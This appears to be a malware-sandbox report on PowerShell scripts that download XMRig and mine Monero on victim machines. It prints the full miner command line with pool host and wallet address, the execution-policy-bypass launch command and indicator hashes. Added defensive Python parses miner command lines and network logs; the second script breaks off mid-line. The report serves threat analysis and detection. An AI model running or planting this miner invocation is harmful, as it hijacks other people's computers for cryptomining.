C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vxllptyy.w1n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win7-20240419-en

Max time kernel

1560s

Max time network

1560s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:34

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3anqpoo.slh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:34

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlqesmbe.5jh.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:44

Platform

win11-20240508-en

Max time kernel

1788s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2832-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0ldgsbq.ypp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:46

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 35.197.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwgvbqe1.f5e.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240215-en

Max time kernel

1562s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240508-en

Max time kernel

1563s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

memory/1736-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/1736-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-6-0x0000000002240000-0x0000000002248000-memory.dmp

memory/1736-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

memory/1736-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/1736-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:49

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows: no description, indicator, process or target was recorded for any match)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

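The xmrig.exe command line recorded above carries every indicator a responder needs: the algorithm (`-a rx`, RandomX, which is also why xmrig.exe requests SeLockMemoryPrivilege for large pages), the pool (`-o stratum+ssl://rx.unmineable.com:443`, TLS on 443 so it blends with HTTPS), the login (`-u XMR:<address>.<worker>`, unMineable's coin:address.worker convention) and a placeholder password. The Python below is an added example written for this report, not code from the sandbox or from XMRig: it parses such a command line into those fields and decides whether a process-creation record looks like a miner. The first sample line is the one from this report; the second, a 7-Zip extraction of main2.rar, is constructed as a benign control. The pool brand list and the Monero address pattern are the editor's assumptions, not something the report states.

```python
import re
import shlex
from urllib.parse import urlsplit

# Two process command lines as a sandbox or EDR would record them. The first is
# the xmrig.exe line from this report; the second is a constructed benign control.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx'
    r' -o stratum+ssl://rx.unmineable.com:443'
    r' -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x',
    r'"C:\Program Files\7-Zip\7z.exe" x main2.rar -oC:\Users\Admin\Desktop',
]

# XMRig option spellings (short and long) for the fields worth extracting.
ALGO_FLAGS = ("-a", "--algo")
URL_FLAGS = ("-o", "--url")
USER_FLAGS = ("-u", "--user")
PASS_FLAGS = ("-p", "--pass")

# Standard Monero address: 95 base58 characters with a leading "4".
MONERO_ADDR_RE = re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")

# Pool brands seen in commodity miner configs (assumed list); "unmineable" is the one here.
KNOWN_POOL_WORDS = ("unmineable", "supportxmr", "hashvault", "nanopool", "2miners", "nicehash")


def _tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes literal."""
    out = []
    for tok in shlex.split(cmdline, posix=False):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            tok = tok[1:-1]
        out.append(tok)
    return out


def _options(tokens):
    """Map '-o value' and '--url=value' forms to their values; bare switches map to True."""
    opts = {}
    i = 1  # token 0 is the image path
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:
            key, val = tok.split("=", 1)
            opts.setdefault(key, []).append(val)
            i += 1
        elif tok.startswith("-") and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            opts.setdefault(tok, []).append(tokens[i + 1])
            i += 2
        else:
            opts.setdefault(tok, []).append(True)
            i += 1
    return opts


def _first(opts, flags):
    """First string value given for any of the flag spellings, else None."""
    for f in flags:
        for v in opts.get(f, []):
            if v is not True:
                return v
    return None


def parse_pool(url):
    """(host, port, tls) from an XMRig pool URL; a bare host:port means plain stratum."""
    if "://" not in url:
        url = "stratum+tcp://" + url
    parts = urlsplit(url)
    return parts.hostname, parts.port, parts.scheme.endswith(("+ssl", "+tls"))


def parse_login(user):
    """unMineable-style COIN:ADDRESS.WORKER; other pools use ADDRESS.WORKER or ADDRESS."""
    coin, sep, rest = user.partition(":")
    if not sep:
        coin, rest = None, user
    address, _, worker = rest.partition(".")
    return coin, address, worker or None


def analyze_miner_cmdline(cmdline):
    """Return extracted mining IOCs when the line looks like an XMRig-style miner, else None."""
    tokens = _tokens(cmdline)
    if not tokens:
        return None
    opts = _options(tokens)
    pool_url, user = _first(opts, URL_FLAGS), _first(opts, USER_FLAGS)
    if pool_url is None or user is None:
        return None  # the image name alone is easy to rename; insist on pool + login
    host, port, tls = parse_pool(pool_url)
    coin, address, worker = parse_login(user)
    algo = _first(opts, ALGO_FLAGS)
    reasons = []
    if pool_url.startswith("stratum"):
        reasons.append("stratum pool URL")
    if host and any(w in host for w in KNOWN_POOL_WORDS):
        reasons.append("known mining pool domain")
    if MONERO_ADDR_RE.match(address):
        reasons.append("Monero payout address")
    if algo == "rx":
        # RandomX wants large pages, which is why xmrig.exe asks for SeLockMemoryPrivilege.
        reasons.append("RandomX algorithm")
    if not reasons:
        return None
    return {
        "image": tokens[0].rsplit("\\", 1)[-1].lower(),
        "algo": algo, "pool_host": host, "pool_port": port, "pool_tls": tls,
        "coin": coin, "address": address, "worker": worker,
        "password": _first(opts, PASS_FLAGS), "reasons": reasons,
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze_miner_cmdline(line))
```

The detection deliberately keys on the pool URL and login rather than the image name: a renamed xmrig.exe still has to tell the pool where to pay, so the wallet address and pool host are the indicators worth blocking and hunting for across the fleet.
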
Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
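
The Network table mixes three kinds of rows: DNS queries to 8.8.8.8, the TCP connections they resolved to, and reverse (PTR) lookups of the form a.b.c.d.in-addr.arpa, where the octets are the peer address written backwards. Reading a PTR name back into an address shows which lookups belong to this sample (20.26.156.215, 185.199.111.133 and 161.35.34.195 are all connected to in the same table) and which have no matching connection and are background traffic of the analysis VM. The Python below is an added example written for this report, not sandbox code: the rows are copied from the table above, the pool host is taken from the xmrig.exe command line, and treating github.com and objects.githubusercontent.com as the download (staging) hosts is an inference from the dropped xmrig-6.21.3 directory name, since the report does not show the download URL.

```python
import ipaddress
import re

# Rows copied from the behavioral22 Network table: country, destination, optional
# domain, protocol. The row without a domain is kept exactly as the report shows it.
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
"""

ROW_RE = re.compile(
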